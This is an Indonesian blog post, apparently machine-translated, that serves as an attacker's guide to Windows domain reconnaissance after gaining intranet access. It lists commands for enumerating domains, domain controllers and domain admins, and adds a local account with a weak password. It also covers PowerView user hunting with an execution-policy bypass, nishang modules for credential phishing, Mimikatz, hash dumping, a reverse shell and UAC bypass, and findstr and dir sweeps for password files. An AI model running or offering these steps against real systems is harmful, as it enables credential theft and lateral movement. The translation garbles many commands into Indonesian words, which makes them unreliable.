Berbagi teknologi

Keamanan intranet: deteksi informasi intra-domain

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

1. Pengumpulan informasi dasar dalam domain

2.NET memerintahkan penjelasan rinci

3. Metode pengumpulan domain terutama digunakan di intranet

4. Cara menemukan pengontrol domain

5. Kueri informasi dasar pengguna di domain

6. Manajemen domain positioning

7. Perintah Powershell dan mencari informasi sensitif







1. Pengumpulan informasi dasar dalam domain:

Empat situasi:

1. Pengguna lokal: pengguna

2. Pengguna administrator lokal: dinonaktifkan di versi rumah, hanya tersedia di server

3. Pengguna dalam domain

4. Administrator domain

Pengguna lokal biasa tidak dapat memperoleh informasi domain

Pengguna administrator lokal dapat langsung meningkatkan haknya kepada pengguna sistem (pengguna dalam domain) dan memperoleh informasi di dalam domain.

1. Tentukan apakah domain tersebut ada:

1. Periksa domain: ipconfig/all atau systeminfo atau net config workstation

ipconfig /all: Domain yang ditemukan: hack.com

systeminfo: Domain yang ditemukan adalah: hack.com

2. Lihat host DNS domain: nama domain nslookup (hack.com)

3. Waktu bersih/domain tiga situasi

Domain ada, namun pengguna saat ini bukan pengguna domain

Sebuah domain ada dan pengguna saat ini adalah pengguna domain

Lingkungan jaringan saat ini adalah kelompok kerja dan tidak ada domain

Detail perintah 2.NET:

Tampilan 1.net: Menampilkan daftar domain, daftar komputer, sumber daya bersama komputer tertentu: tampilan bersih (menampilkan daftar komputer) tampilan bersih \komputer (melihat komputer bersama yang ditentukan)

tampilan bersih /domain:nama domain (hack) (menampilkan daftar komputer)

2.net user untuk melihat pengguna lokal: net user /domain untuk melihat berapa banyak pengguna di domain tersebut

Tambahkan pengguna: nama pengguna bersih (admin) kata sandi (123)/tambahkan

3. penggunaan bersih: Hubungkan komputer atau putuskan sambungan komputer dari sumber daya bersama, tampilkan informasi koneksi komputer

4.waktu bersih: Gunakan waktu untuk menyinkronkan komputer atau domain: waktu bersih \waktu bersih komputer /domain

5.net start: Memulai layanan, atau menampilkan layanan yang dimulai: layanan mulai net

6.net jeda: Jeda layanan yang sedang berjalan: layanan jeda bersih

7.net lanjutkan: Aktifkan kembali layanan: layanan lanjutkan bersih

8.net stop: Hentikan layanan Windows NT/2000/2003: layanan net stop

9.net share: menghapus, membuat, atau menampilkan sumber daya bersama

Sesi 10.net: Daftar atau putuskan sesi komputer lokal dan klien yang terhubung dengannya:

net session //komputer (mengidentifikasi komputer yang akan didaftar atau sesi)

net session //hapus komputer (putuskan sambungan sesi komputer yang ditentukan)

11.net localgroup Lihat grup komputer (hanya berlaku untuk lokal): nama pengguna grup lokal bersih

Pengguna domain: nama pengguna/domain grup lokal bersih

12.grup net menanyakan nama grup di domain (hanya berlaku untuk pengontrol domain): grup net /domain

Konfigurasi 13.net menampilkan layanan konfigurasi yang sedang berjalan, atau menampilkan dan mengubah konfigurasi layanan (secara lokal):

net config (menampilkan layanan yang sedang berjalan) net config services (menampilkan daftar layanan)

14.net komputer Menambah atau menghapus komputer dari database domain:

net computer \computername /add atau /del (menambah atau menghapus komputer ke domain login)

3. Metode pengumpulan domain terutama digunakan di intranet

Jika muncul "Daftar server grup kerja ini saat ini tidak tersedia", aktifkan layanan: Server, WorkStation, Browser komputer, dan tutup firewall.

Lihat domain: ipconfig/all atau systeminfo atau net config workstation

Lihat host DNS domain: nama domain nslookup (hack.com)

Domain kueri: tampilan bersih/domain

Kueri semua komputer di domain: net view /domain:nama domain

Kueri daftar semua grup pengguna di domain: grup net /domain

Kueri daftar komputer semua anggota domain: grup net "komputer domain" /domain

Kueri informasi kata sandi di domain: akun net /domain

Dapatkan informasi kepercayaan domain: nltest /domain_trusts

4. Cara menemukan pengontrol domain

Lihat nama pengontrol domain: nltest /DCLIST:hack

Lihat nama mesin, temukan IP, ping/nslookup: nama pengontrol domain ping/nslookup

Terkadang ping dinonaktifkan.

Lihat nama host pengontrol domain: nslookup ‐type=SRV _ldap._tcp

Periksa waktu saat ini: waktu bersih/domain

Lihat grup pengontrol domain: grup net "Pengontrol Domain" /domain

5. Kueri informasi dasar pengguna di domain

1. Kueri informasi pengguna di domain: pengguna bersih /domain

2. Lihat pengguna lokal: akun pengguna wmic mendapatkan nama Pengguna domain: akun pengguna wmic mendapatkan domain, nama

Pengguna lokal:

Pengguna domain:

3. Cek user yang ada : dsquery user (terkadang tidak bisa dijalankan dan hanya bisa dijalankan di mesin server)

4. Kueri grup pengguna administrator lokal: administrator grup lokal bersih

5. Permintaan pengguna administrator domain: grup bersih "admin domain" /domain

6. Kueri grup pengguna administrator domain: grup net "Admin Perusahaan" /domain

6. Manajemen domain positioning

Dua alat dibutuhkan di sini

Pertama-tama unggah alat tersebut ke server dan kemudian jalankan

1.PVEFindADUser: PVEFindADUser.exe -current (perhatikan jalurnya) Alat ini dapat memeriksa pengguna mana yang telah masuk ke komputer, memungkinkan kita menemukan administrator domain

2.skrip powerView:

powershell.exe ‐exec bypass ‐perintah "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"

7. Perintah Powershell dan mencari informasi sensitif

Periksa izinnya terlebih dahulu: Get-ExecutionPolicy

Ubah kebijakan yang sedang berjalan: Set-ExecutionPolicy Unrestricted (hanya izin Tidak Terbatas yang dapat menjalankan pow)

nishang tool (link download ada di artikel sebelumnya):

Setelah ditempatkan di direktori CS, langsung impor: powershell-import nishang/nishang.psm1

Jalankan: perintah PowerShell

Beberapa perintah yang umum digunakan:

Check-VM: Periksa apakah host adalah mesin virtual

Invoke-CredentialsPhish: Menipu pengguna agar memasukkan kata sandinya

Dapatkan-WLAN-Kunci: informasi wifi

Invoke-Mimikatz: Tangkap kata sandi

Dapatkan-PassHash: Dapatkan hash

Get-PassHints: Dapatkan informasi petunjuk kata sandi pengguna

Invoke-PowerShellTcp: Shell memantul

Panggil-PsUACme: Lewati UAC

Hapus-Pembaruan: Hapus tambalan

Dapatkan-Informasi: informasi lokal

Contoh: PowerShell Check-VM

Menemukan data sensitif:

1. Kumpulkan berbagai file sensitif di direktori yang ditentukan

dir /a /s /bd:"*.txt"

dir /a /s /b C:"*.xlsx"

dir /a /s /bd:"*.md"

dir /a /s /bd:"*.sql"

dir /a /s /bd:"*.pdf"

dir /a /s /bd:"*.docx"

dir /a /s /bd:"*.doc"

dir /a /s /bd:"*konf*"

dir /a /s /bd:"*bak*"

dir /a /s /bd:"*pwd*"

dir /a /s /bd:"*pass*"

dir /a /s /bd:"*masuk*"

dir /a /s /bd:"*pengguna*"

2. Kumpulkan berbagai kata sandi akun dari file di direktori yang ditentukan

temukan string /si lewat *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

temukan /si kata sandi pengguna *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

temukan kode /si kata sandi *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

temukan /si masuk *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si pengguna *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

Contoh: dir /a /s /bd:"*.txt"